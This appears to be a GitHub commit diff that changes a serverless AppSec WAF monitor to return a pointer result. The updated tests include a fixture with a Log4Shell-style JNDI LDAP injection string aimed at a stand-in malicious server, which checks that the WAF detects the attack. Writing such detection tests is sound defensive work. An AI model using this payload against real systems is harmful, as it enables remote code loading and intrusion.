Skip to content

Commit

Permalink
appsec/serverless: return waf result as pointer
Browse files Browse the repository at this point in the history
  • Loading branch information
Hellzy committed Nov 23, 2023
1 parent c57e966 commit e3d23db
Show file tree
Hide file tree
Showing 3 changed files with 11 additions and 9 deletions.
10 changes: 5 additions & 5 deletions pkg/serverless/appsec/appsec.go
Original file line number Diff line number Diff line change
Expand Up @@ -110,11 +110,11 @@ func (a *AppSec) Close() error {

// Monitor runs the security event rules and return the events as a slice
// The monitored addresses are all persistent addresses
func (a *AppSec) Monitor(addresses map[string]any) (res waf.Result) {
func (a *AppSec) Monitor(addresses map[string]any) *waf.Result {
log.Debugf("appsec: monitoring the request context %v", addresses)
ctx := waf.NewContext(a.handle)
if ctx == nil {
return res
return nil
}
defer ctx.Close()
timeout := a.cfg.WafTimeout
Expand All @@ -130,7 +130,7 @@ func (a *AppSec) Monitor(addresses map[string]any) (res waf.Result) {
log.Debugf("appsec: waf timeout value of %s reached", timeout)
} else {
log.Errorf("appsec: unexpected waf execution error: %v", err)
return res
return nil
}
}

Expand All @@ -140,9 +140,9 @@ func (a *AppSec) Monitor(addresses map[string]any) (res waf.Result) {
}
if !a.eventsRateLimiter.Allow() {
log.Debugf("appsec: security events discarded: the rate limit of %d events/s is reached", a.cfg.TraceRateLimit)
res = waf.Result{}
return nil
}
return res
return &res
}

// wafHealth is a simple test helper that returns the same thing as `waf.Health`
Expand Down
8 changes: 5 additions & 3 deletions pkg/serverless/appsec/appsec_test.go
Original file line number Diff line number Diff line change
Expand Up @@ -69,8 +69,9 @@ func TestMonitor(t *testing.T) {
},
"server.request.body": "eyJ0ZXN0I${jndi:ldap://16.0.2.staging.malicious.server/a}joiYm9keSJ9",
}
events := asm.Monitor(addresses)
require.NotNil(t, events)
res := asm.Monitor(addresses)
require.NotNil(t, res)
require.True(t, res.HasEvents())
})

t.Run("api-security", func(t *testing.T) {
Expand Down Expand Up @@ -136,7 +137,8 @@ func TestMonitor(t *testing.T) {
"query": {"$http_server_vars"},
},
})
require.NotEmpty(t, res.Derivatives)
require.NotNil(t, res)
require.True(t, res.HasDerivatives())
schema, err := json.Marshal(res.Derivatives)
require.NoError(t, err)
require.Equal(t, tc.schema, string(schema))
Expand Down
2 changes: 1 addition & 1 deletion pkg/serverless/appsec/httpsec/http.go
Original file line number Diff line number Diff line change
Expand Up @@ -31,7 +31,7 @@ import (
// subprocessor monitoring the given security rules addresses and returning
// the security events that matched.
type Monitorer interface {
Monitor(addresses map[string]any) waf.Result
Monitor(addresses map[string]any) *waf.Result
}

// AppSec monitoring context including the full list of monitored HTTP values
Expand Down

0 comments on commit e3d23db

Please sign in to comment.